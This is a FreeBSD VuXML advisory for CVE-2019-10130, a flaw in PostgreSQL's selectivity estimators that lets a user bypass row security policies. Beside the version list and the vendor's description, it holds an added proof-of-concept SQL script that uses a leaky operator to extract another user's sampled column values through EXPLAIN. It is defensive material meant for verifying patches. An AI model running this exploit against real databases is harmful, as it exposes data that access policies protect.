FreeBSD VuXML: Documenting security issues in FreeBSD and the FreeBSD Ports Collection

PostgreSQL -- Selectivity estimators bypass row security policies

Affected packages
postgresql11-server < 11.3
postgresql10-server < 10.8
postgresql96-server < 9.6.13
postgresql95-server < 9.5.17

Details

VuXML ID 065890c3-725e-11e9-b0e1-6cc21735f730
Discovery 2019-05-09
Entry 2019-05-09

The PostgreSQL project reports:

PostgreSQL maintains statistics for tables by sampling data available in columns; this data is consulted during the query planning process. Prior to this release, a user able to execute SQL queries with permissions to read a given column could craft a leaky operator that could read whatever data had been sampled from that column. If this happened to include values from rows that the user is forbidden to see by a row security policy, the user could effectively bypass the policy. This is fixed by only allowing a non-leakproof operator to use this data if there are no relevant row security policies for the table.
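
The following script is an added example (not from the advisory or from the PostgreSQL project) that exercises the mechanism described above so an operator can check whether a server carries the fix. The table, role, function and operator names (`accounts`, `alice`, `leaky_eq`, `===`) are assumptions chosen for the demonstration; it relies only on documented behaviour: `eqsel` consults the column's most-common-values list, and for an operator that is not the type's standard equality operator the planner evaluates the operator's own function against those sampled values.

```sql
-- Added example, not part of the advisory. Run the setup as a superuser
-- or table owner; the leak is then demonstrated as the restricted role.
-- Assumes the default public schema still grants CREATE to PUBLIC, as it
-- does in the affected releases.
CREATE TABLE accounts (
    id      serial PRIMARY KEY,
    owner   text   NOT NULL,
    balance int    NOT NULL
);
-- Constructed data: 50 distinct rows for alice, 50 identical rows for bob,
-- so bob's balance (9000) is guaranteed to land in the MCV statistics.
INSERT INTO accounts (owner, balance)
    SELECT 'alice', 1000 + g FROM generate_series(1, 50) AS g
    UNION ALL
    SELECT 'bob', 9000 FROM generate_series(1, 50);

-- Row security: each role may read only its own rows.
ALTER TABLE accounts ENABLE ROW LEVEL SECURITY;
CREATE POLICY own_rows ON accounts FOR SELECT USING (owner = current_user);
CREATE ROLE alice;
GRANT SELECT ON accounts TO alice;

-- Populate pg_statistic (autovacuum would eventually do this on its own).
ANALYZE accounts;

-- Everything below runs with alice's privileges only.
SET ROLE alice;

-- A "leaky" comparison: it reports every left-hand value it is asked to
-- compare. It is not LEAKPROOF (alice could not declare it so anyway;
-- only superusers can).
CREATE FUNCTION leaky_eq(int, int) RETURNS boolean
    LANGUAGE plpgsql AS $$
BEGIN
    RAISE NOTICE 'saw value %', $1;
    RETURN $1 = $2;
END
$$;

-- Bind it to an operator whose restriction estimator is eqsel. Since ===
-- is not int's default equality operator, the planner calls leaky_eq on
-- each sampled most-common value while estimating selectivity.
-- PROCEDURE is the spelling accepted by all affected major versions.
CREATE OPERATOR === (
    LEFTARG   = int,
    RIGHTARG  = int,
    PROCEDURE = leaky_eq,
    RESTRICT  = eqsel,
    JOIN      = eqjoinsel
);

-- EXPLAIN is enough: only planning runs, no rows are ever fetched.
EXPLAIN SELECT * FROM accounts WHERE balance === 0;

RESET ROLE;
```

On an unfixed server the `EXPLAIN` emits `NOTICE: saw value 9000`, bob's balance, which the policy forbids alice to read; on 11.3, 10.8, 9.6.13 or 9.5.17 no notice is raised during planning, because the estimator refuses to feed sampled data to a non-leakproof operator when a row security policy applies to the table and falls back to a default selectivity estimate. Actually executing the query would not leak either: the policy's `USING` qualifier is applied as a security barrier before any user-supplied, non-leakproof qualifier, so `leaky_eq` would only ever see alice's own rows.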

References

CVE Name CVE-2019-10130
URL https://www.postgresql.org/about/news/1939/